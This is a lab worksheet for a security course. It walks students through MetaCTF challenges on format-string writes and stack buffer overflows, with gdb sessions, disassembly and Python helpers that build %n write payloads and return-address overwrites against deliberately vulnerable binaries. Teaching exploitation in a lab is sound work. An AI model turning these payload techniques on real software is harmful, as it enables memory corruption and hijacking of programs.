Linux Buffer Overflows and Advanced Format String Attacks

Learn advanced software security exploitation techniques including format string attacks and buffer overflow vulnerabilities on Linux systems.

Lab Overview

In this lab, you will face some additional challenges designed to help you develop your understanding of software security and vulnerabilities. You will learn how to perform format string attacks, which exploit programs that pass user-controlled input to a function such as printf as the format string, allowing an attacker to read or write program memory through format specifiers. You will also further explore buffer overflows, a common security issue that arises when a program writes more data into a buffer than it can hold, overwriting adjacent and possibly critical data.

Authors: Thomas Shaw

License: CC BY-SA 4.0

Difficulty: advanced

CyBOK Knowledge Areas: SS: Categories of Vulnerabilities (memory management vulnerabilities; stack smashing; buffer overflows; format string attacks). MAT: Attacks and exploitation (EXPLOITATION; EXPLOITATION FRAMEWORKS; exploit development; Metasploit Framework development).

Tags: buffer-overflow format-string exploitation linux assembly gdb

Lab overview

This week’s topic involves a practical exploration of exploits on Linux-based systems. The practical challenges involve exploiting buffer overflow vulnerabilities and a format string vulnerability. Three flags are available from MetaCTF challenges: two for challenges involving buffer overflows and one that requires you to perform a more advanced format string attack.

Format String Attacks

==VM: On your Desktop Debian Linux VM==

==action: Browse the challenges directory==

ls ~/challenges

When you run each program it will give you instructions and hints on how to solve the challenge.

==action: Run each of the challenges (always after changing to the directory first)==:

Following on from prior labs, this week includes another format string challenge. Similar to the previous challenges, this executable was compiled with stack protections and ASLR disabled.

Direct Memory Access

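The $ modifier in a format specifier allows us to directly access a specific argument on the stack by its position. For example, %4$x prints the fourth argument as hexadecimal without having to step through the first three.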

==action: Experiment with the input in order to see which element on the stack we control==. We can do this with our direct memory lookup ($) rather than manually calculating the offset.

==hint: e.g. “AAAA%4$08x”==
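The experiment above can be scripted. The following is a minimal sketch that generates one probe per stack position and then looks for the marker in the results. The helper names and the sample outputs are invented for illustration; on the VM you would feed each probe to the challenge binary and record what it actually prints.

```python
import struct
from typing import Optional


def make_probes(marker=b"AAAA", max_index=12):
    """Build one probe per stack position, e.g. b'AAAA%4$08x'."""
    return [marker + b"%%%d$08x" % i for i in range(1, max_index + 1)]


def marker_as_hex(marker):
    """Hex text that %08x prints when a slot holds the marker (little-endian)."""
    return "%08x" % struct.unpack("<I", marker)[0]


def find_index(outputs, marker=b"AAAA") -> Optional[int]:
    """Return the first position whose output contains the marker in hex."""
    needle = marker_as_hex(marker)
    for index in sorted(outputs):
        if needle in outputs[index]:
            return index
    return None


# Hypothetical outputs (not taken from the real binary), keyed by position.
sample_outputs = {3: "AAAAf7fb2000", 4: "AAAA41414141"}

print(make_probes(max_index=4)[3])   # the probe for position 4
print(find_index(sample_outputs))    # position that echoes the marker
```

The position reported for the real binary is the number to use with a targeted %n later on.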

cd Ch3_Format5_nTargetWrite/

./Ch3_Format5_nTargetWrite

Previously, we placed the address to write to onto the stack so that it
was easy to discover and target with %n.  Unfortunately, this will not
always be present.  However, because the input string being used in the
printf call is usually stored on the stack, it is possible to inject the
address we want to write into as part of our input and then use a targeted
%n to write into the injected address. To do so, you will first locate
where the input string characters are located on the stack relative to
the vulnerable printf call by injecting a well-known string and then using
a series of %x format specifiers to determine its offset on the stack from
the printf call.  To do so, use an input string similar to:
   "ABCD-%x-%x-%x-%x-%x...."
Look at the resultant output to see where the hexadecimal representation
of ABCD appears (e.g. 44434241 for little-endian machines).  Once we find
our input on the stack, note its parameter number since this is the
number we will then target with a subsequent %n.  After noting this number
we can then replace the "ABCD" part of the input with an actual address.
At this point, we need to find what address to write to and the value
we need to write.  For this level, you are asked to overwrite a variable
called key with a specific number.  To determine the address of key and
the value to write into it, examine the disassembly of the program.
Locate the comparison that determines whether or not the level has been
completed.  The value of key is moved from a specific memory location
to a register before being checked against a specific value.  Note that
we have made the address of this memory location representable as an ASCII
string to make things easier for you to input as a string.  By using this
in place of ABCD, you will then be able to follow it with an appropriately
calculated %<num1>x%<num2>$n to solve the level.

The key should equal to 265.
Enter the password:
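The arithmetic behind %<num1>x%<num2>$n can be sketched as follows. %n stores the number of characters printed so far, so the padding width is the target value minus the bytes already printed by the injected address. The address bytes b"ABCD" and the parameter number 4 below are placeholders, not values from the challenge: take the real address from the disassembly and the real parameter number from your own probing. The sketch also assumes the value printed by the padded %x fits within the requested width, which holds for any 32-bit value and a width of 8 or more.

```python
def build_write_payload(address, target_value, param_index):
    """Address bytes, then padding so that target_value characters have
    been printed, then a targeted %n that writes the count to the address."""
    padding = target_value - len(address)
    if padding < 1:
        raise ValueError("target value is too small for this layout")
    return address + b"%%%dx%%%d$n" % (padding, param_index)


# Placeholder address and parameter number, for illustration only.
payload = build_write_payload(b"ABCD", 265, 4)
print(payload)
```

With a four-byte address the padding is 261, since 4 + 261 = 265, the value the level asks for.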


Buffer Overflows on Linux Systems

Some programming languages require the programmer to manually manage memory. This involves defining how much memory is allocated for a variable to store data in. Programmers can make incorrect assumptions whilst reserving memory for variable-length pieces of data.

If a user can supply data which is insecurely copied to a memory location which is not large enough to contain it, adjacent memory can be overwritten.

If the memory location being written to is stored on the stack (i.e. as a local function variable or a function parameter), adjacent memory may contain critical data that is used in the control flow of the program. A prime example of this is the return address, which is pushed onto the stack when a function is called so that the program knows where to return to. If we can overwrite this address, we can make the program return to another location.
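To make the layout concrete, here is a small simulation of a stack frame as a byte array. It is only a model: the 16-byte buffer size, the saved frame pointer value, and both addresses are made up, and real frames may include padding or other locals.

```python
import struct

BUF_SIZE = 16  # hypothetical size of the local buffer


def make_frame(return_address):
    """Model: [buffer][saved rbp][return address], lowest address first."""
    saved = struct.pack("<QQ", 0x7FFFFFFFE000, return_address)
    return bytearray(BUF_SIZE) + bytearray(saved)


def unsafe_copy(frame, data):
    """Copy with no bounds check, as strcpy or scanf("%s") would."""
    frame[0:len(data)] = data


def read_return_address(frame):
    """Read the 8-byte return address that follows the saved rbp."""
    return struct.unpack_from("<Q", frame, BUF_SIZE + 8)[0]


frame = make_frame(0x401234)
unsafe_copy(frame, b"A" * BUF_SIZE)            # fits: nothing else changes
print(hex(read_return_address(frame)))

overflow = b"A" * (BUF_SIZE + 8) + struct.pack("<Q", 0x401156)
unsafe_copy(frame, overflow)                   # too long: clobbers the frame
print(hex(read_return_address(frame)))
```

The second copy writes past the buffer, through the saved frame pointer, and replaces the return address with a value the attacker chose.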

Buffer overflow CTF challenges

cd Ch3_07_StackSmash/

./Ch3_07_StackSmash

One way attackers used to leverage buffer overflow bugs to gain control of
a running program is to overwrite the return address of the function being
executed on the stack.  When the function returns, it returns to an address
the attacker chooses.  In this level, you are to overflow the buffer being
used to read in the password in a way that overwrites the return address of
the function it is in (unsafe_input).  A quick strategy to determine the
size of the unsafe buffer is to "fuzz" the program with a large sequence
of characters such as (AABBCCDDEEFFGG...) and see which ones appear during
critical execution points such as the return from unsafe_input. To simplify
the task of corrupting the return address, the location of the call you want
to return to that unlocks the program is in the ASCII range.  Be mindful of
endianness and ensure that you only overwrite the low 32-bits to point to
the function you want to return to.

Enter the password:
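The fuzzing strategy described in the challenge text can be sketched like this. The observed bytes and the target address are invented for illustration: in practice you would read the bytes at the return address in gdb and take the target address from the disassembly.

```python
import string
import struct


def fuzz_pattern(pairs=26):
    """AABBCCDD...: two of each uppercase letter, as the challenge suggests."""
    return "".join(ch * 2 for ch in string.ascii_uppercase[:pairs]).encode()


def offset_of(observed, pattern):
    """Offset in the pattern where the observed bytes begin."""
    return pattern.index(observed)


def build_payload(offset, target_address):
    """Padding up to the return address, then the low 32 bits of the
    target address in little-endian byte order."""
    return b"A" * offset + struct.pack("<I", target_address & 0xFFFFFFFF)


pattern = fuzz_pattern()
offset = offset_of(b"MMNN", pattern)       # hypothetical bytes seen at ret
payload = build_payload(offset, 0x41424344)  # hypothetical ASCII-range address
print(offset, payload)
```

Note how the little-endian packing reverses the byte order: the hypothetical address 0x41424344 is sent as the characters DCBA.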

cd Ch3_07_ScanfOverflow/

./Ch3_07_ScanfOverflow

When receiving input from a user, it is important to limit the number
of characters accepted so that the input buffer does not overflow.
This level has the following code that is vulnerable to a buffer overflow.
    char buff[N];
    char guess[N];
    strncpy(guess,"REPLACE",8);
    .....
    scanf("%s",buff);
    if(strcmp(guess,password)==0)
In the code, the password variable stores the password and the guess
variable is filled in with the string REPLACE.  The strcmp is thus setup
to always fail.  However, the user's input buffer (buff) is vulnerable to
overflow since the scanf does not have a length delimiter associated
with it.  In this case, characters beyond buff will end up in guess.
Using the debugger, find what the password is, then determine the number
of bytes needed to overflow the buffer.  Finally, generate an input that
will overflow buff to place the password in guess.

Enter the password:

Tip: This challenge has a vulnerable scanf() call within the user_input(param) function. The call is vulnerable because there is no bounds checking and the user controls the input string. The input is read from stdin and stored in buff[n]. We can pass more than n characters into buff[], leading to a buffer overflow that overwrites contiguous memory.

First, run the program within gdb, e.g. gdb -q ./Ch3_07_ScanfOverflow (the -q flag is ‘quiet mode’, which suppresses the long copyright intro text). If we disassemble main we can see that there is a call to user_input at main <+160>:

serpent@p-26-220-10-vIM8-5-linux-bof-format-metactf-desktop:~/challenges/Ch3_07_ScanfOverflow$ gdb -q ./Ch3_07_ScanfOverflow

Reading symbols from ./Ch3_07_ScanfOverflow...(no debugging symbols found)...done.

(gdb) disassemble main

Dump of assembler code for function main:
   ...
   0x000000000040138b <+153>:   lea    rax,[rbp-0x10]
   0x000000000040138f <+157>:   mov    rdi,rax
   0x0000000000401392 <+160>:   call   0x4011b2 <user_input>
   ...
End of assembler dump.

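The main function contains some print statements and this user_input call, which takes one parameter. This parameter is stored in $rdi before the function is called (per the x86_64 Linux calling convention). To inspect it, set a breakpoint on the call (e.g. break *0x0000000000401392), run the program, and examine $rdi when the breakpoint is hit: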

(gdb) x/s $rdi

0x7fffffffdfd0: "M2Y4MDg4\b"

Note: Interesting looking string, probably our password…

==action: We should then disassemble user_input to see what’s happening inside the function==.

(gdb) disassemble user_input

Dump of assembler code for function user_input:
   ...
   0x00000000004011fb <+73>:    lea    rax,[rbp-0x10]
   0x00000000004011ff <+77>:    mov    rsi,rdx
   0x0000000000401202 <+80>:    mov    rdi,rax
   0x0000000000401205 <+83>:    call   0x4010a0 <strcmp@plt>   
   0x000000000040120a <+88>:    test   eax,eax
   0x000000000040120c <+90>:    jne    0x401224 <user_input+114>
   0x000000000040120e <+92>:    mov    edi,0x40201c
   0x0000000000401213 <+97>:    call   0x401040 <puts@plt>
   0x0000000000401218 <+102>:   mov    eax,0x0
   0x000000000040121d <+107>:   call   0x401231 <printflag>
   0x0000000000401222 <+112>:   jmp    0x40122e <user_input+124>
   0x0000000000401224 <+114>:   mov    edi,0x402026
   0x0000000000401229 <+119>:   call   0x401040 <puts@plt>
   ...
End of assembler dump.

Next we should figure out what’s happening here. We want to work backwards from our printflag call and try to figure out what we need to provide to get there.

<+83> is a call to strcmp, comparing the strings pointed to by $rsi and $rdi
<+90> is a jump-not-equal instruction, which jumps to <+114> if the strings do not match
<+107> is our call to printflag (the win function), which runs if the strings match
<+114> loads some data into $edi, which is used as a parameter for…
<+119> printing the ‘Try again’ message

So we need to find out how $rsi and $rdi are populated prior to this strcmp call at user_input <+83>.

==action: Let’s set a breakpoint at the strcmp call at 0x0000000000401205, then inspect the registers without any input that would overflow the buffer==:

(gdb) break *0x0000000000401205

Breakpoint 2 at 0x401205

(gdb) c

Continuing.

Enter the password: asdf

Breakpoint 2, 0x0000000000401205 in user_input ()

(gdb) x/s $rsi

0x7fffffffdfd0: "M2Y4MDg4\b"

(gdb) x/s $rdi

0x7fffffffdfa0: "REPLACE"

Note: OK, so we can see that the two parameters to strcmp are the password, followed by a \b character (which is odd…), and the string REPLACE.

Now we’ve got our breakpoint set up, we can pass in a long pattern string to see which of these registers we’re influencing (and here’s the misleading part…)

(gdb) r <<< $(printf "AAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO")

The program being debugged has been started already.

Start it from the beginning? (y or n) y

Starting program: /home/serpent/challenges/Ch3_07_ScanfOverflow/Ch3_07_ScanfOverflow <<< $(printf "AAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO")

...

Breakpoint 1, 0x0000000000401392 in main ()

(gdb) c

Continuing.

Breakpoint 2, 0x0000000000401205 in user_input ()

(gdb) x/s $rsi

0x7fffffffdfd0: "JJJJKKKKLLLLMMMMNNNNOOOO"

(gdb) x/s $rdi

0x7fffffffdfa0: "REPLACE"

Note: The $rdi and $rsi registers above contain the parameters that get passed to the strcmp function (i.e. the two strings that are being compared). Note that our input ends up in $rsi, at the address where the password was stored, whereas $rdi still holds the string REPLACE. In other words, the overflow has overwritten the password rather than guess.
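The offset at which our input reaches $rsi can be worked out from the pattern and the gdb output above. The sketch below uses only the values shown in this walkthrough and assumes they are the same on your VM. The build_input helper is hypothetical, and the candidate input at the end is one idea to test, not a confirmed solution.

```python
# Values copied from the gdb session above.
PATTERN = b"AAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO"
SEEN_IN_RSI = b"JJJJKKKKLLLLMMMMNNNNOOOO"
RSI_ADDRESS = 0x7FFFFFFFDFD0

# Number of input bytes consumed before reaching the string in $rsi.
offset = PATTERN.index(SEEN_IN_RSI)

# Where the input buffer must therefore start in memory.
buff_start = RSI_ADDRESS - offset


def build_input(offset, value, filler=b"A"):
    """Filler up to the offset, then the bytes to place at $rsi's address.
    scanf("%s") appends the terminating NUL byte itself."""
    return filler * offset + value


print(offset, hex(buff_start))
# Candidate to try: make the string at $rsi equal to the one at $rdi.
print(build_input(offset, b"REPLACE"))
```

Since strcmp succeeds when both strings are equal, controlling the string at $rsi may be enough to reach printflag; check the result in gdb at the same breakpoint.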

Conclusion

At this point you have:

Written a format string attack to overwrite a variable at a chosen memory address
Exploited some buffer overflows on Linux

Well done!